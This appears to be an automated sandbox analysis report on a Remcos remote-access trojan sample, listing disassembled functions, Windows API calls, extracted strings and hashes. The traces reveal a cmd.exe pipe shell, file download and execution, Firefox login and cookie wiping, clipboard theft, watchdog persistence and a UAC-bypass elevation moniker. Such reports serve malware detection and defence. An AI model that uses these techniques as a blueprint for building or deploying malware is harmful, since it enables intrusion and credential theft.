                                              • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                              • String ID: (PG$(aF$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                              • API String ID: 1067849700-414524693
                                              • Opcode ID: 085f496563eb3368f1495d8a85dc81db8c626588090c1be3a7cd01995f697149
                                              • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                              • Opcode Fuzzy Hash: 085f496563eb3368f1495d8a85dc81db8c626588090c1be3a7cd01995f697149
                                              • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                              Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 004056E6
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              • __Init_thread_footer.LIBCMT ref: 00405723
                                              • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                              • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                              • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                              • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                              • CloseHandle.KERNEL32 ref: 00405A23
                                              • CloseHandle.KERNEL32 ref: 00405A2B
                                              • CloseHandle.KERNEL32 ref: 00405A3D
                                              • CloseHandle.KERNEL32 ref: 00405A45
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                              • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                              • API String ID: 2994406822-18413064
                                              • Opcode ID: b3bbc8d737d3af4eb4071cdf5bd626515db55c2f233fbcd9ae6de138180310ec
                                              • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                              • Opcode Fuzzy Hash: b3bbc8d737d3af4eb4071cdf5bd626515db55c2f233fbcd9ae6de138180310ec
                                              • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                              Function 00412132 Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 238threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                              • CloseHandle.KERNEL32(00000000), ref: 00412190
                                              • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                              • String ID: 8)[$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                              • API String ID: 3018269243-3188079652
                                              • Opcode ID: 0bc6abb93a007a62e155aad46a945be6e257eeb2644a433d62495adb5594a49a
                                              • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                              • Opcode Fuzzy Hash: 0bc6abb93a007a62e155aad46a945be6e257eeb2644a433d62495adb5594a49a
                                              • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                              Function 0040F4AF Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 210processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,0C[), ref: 0040F4C9
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,0C[), ref: 0040F4F4
                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,0C[), ref: 0040F59E
                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                              • CloseHandle.KERNEL32(00000000,?,0C[), ref: 0040F6A9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                              • String ID: 0C[$8)[$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$xdF$xdF
                                              • API String ID: 3756808967-3218781135
                                              • Opcode ID: c575ac8939463ca684cedb7c6906afd83d502d5e5bbe83c4c666d8f6a0325efa
                                              • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                              • Opcode Fuzzy Hash: c575ac8939463ca684cedb7c6906afd83d502d5e5bbe83c4c666d8f6a0325efa
                                              • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                              Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                              • FindClose.KERNEL32(00000000), ref: 0040BC04
                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                              • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$CloseFile$FirstNext
                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                              • API String ID: 1164774033-3681987949
                                              • Opcode ID: 6c639a8cbac5ca484f8773e9da93299d118512ec2cf8b834913427766c983489
                                              • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                              • Opcode Fuzzy Hash: 6c639a8cbac5ca484f8773e9da93299d118512ec2cf8b834913427766c983489
                                              • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                              Function 004168FC Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 80clipboardmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenClipboard.USER32 ref: 004168FD
                                              • EmptyClipboard.USER32 ref: 0041690B
                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                              • GlobalLock.KERNEL32(00000000), ref: 00416934
                                              • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                              • CloseClipboard.USER32 ref: 00416990
                                              • OpenClipboard.USER32 ref: 00416997
                                              • GetClipboardData.USER32(0000000D), ref: 004169A7
                                              • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                              • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                              • CloseClipboard.USER32 ref: 004169BF
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                              • String ID: !D@$xdF
                                              • API String ID: 3520204547-3540039394
                                              • Opcode ID: 42f4f6424a784916a7480506ad13e9ef758327aee133477e61e13fa0399f6aab
                                              • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                              • Opcode Fuzzy Hash: 42f4f6424a784916a7480506ad13e9ef758327aee133477e61e13fa0399f6aab
                                              • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                              Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                              • FindClose.KERNEL32(00000000), ref: 0040BE04
                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                              • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                              • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$Close$File$FirstNext
                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                              • API String ID: 3527384056-432212279
                                              • Opcode ID: ac2c58898ed4881048f14169fe64a4f28670cbea93e3b81032ca527b9b506f8a
                                              • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                              • Opcode Fuzzy Hash: ac2c58898ed4881048f14169fe64a4f28670cbea93e3b81032ca527b9b506f8a
                                              • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                              Function 0041330D Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                              • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                              • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                              • CloseHandle.KERNEL32(?), ref: 004134A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                              • String ID:
                                              • API String ID: 297527592-0
                                              • Opcode ID: 7983295fa93a8ce34907280adcb851366deb912889fe0d98b6bb4a5c67fd3659
                                              • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                              • Opcode Fuzzy Hash: 7983295fa93a8ce34907280adcb851366deb912889fe0d98b6bb4a5c67fd3659
                                              • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                              Function 00419662 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 0$1$2$3$4$5$6$7$VG
                                              • API String ID: 0-1861860590
                                              • Opcode ID: fa5d28c5653a06ee74d606b0804547a39682ca64517b0fde9ecd30e9690a319d
                                              • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                              • Opcode Fuzzy Hash: fa5d28c5653a06ee74d606b0804547a39682ca64517b0fde9ecd30e9690a319d
                                              • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                              Function 0041C322 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C37D
                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C3AD
                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C41F
                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C42C
                                                • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C402
                                              • GetLastError.KERNEL32(?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C44D
                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C463
                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C46A
                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C473
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                              • String ID: 8)[
                                              • API String ID: 2341273852-1841724077
                                              • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                              • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                              • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                              • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                              Function 00452690 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 188COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                              • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                              • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                              • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                              • String ID: v%(/$JD$JD$JD
                                              • API String ID: 745075371-3850476003
                                              • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                              • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                              • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                              • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                              Function 004167EF Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 97libraryloadershutdownCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                              • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                              • String ID: !D@$$aF$(aF$,aF$PowrProf.dll$SetSuspendState
                                              • API String ID: 1589313981-3345310279
                                              • Opcode ID: f211d8f8c74b43f6a7a1cfd36ff4f80e992d88f1a6359d5e6e54e6d8489d3d1a
                                              • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                              • Opcode Fuzzy Hash: f211d8f8c74b43f6a7a1cfd36ff4f80e992d88f1a6359d5e6e54e6d8489d3d1a
                                              • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                              Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 0040755C
                                              • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Object_wcslen
                                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                              • API String ID: 240030777-3166923314
                                              • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                              • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                              • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                              • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
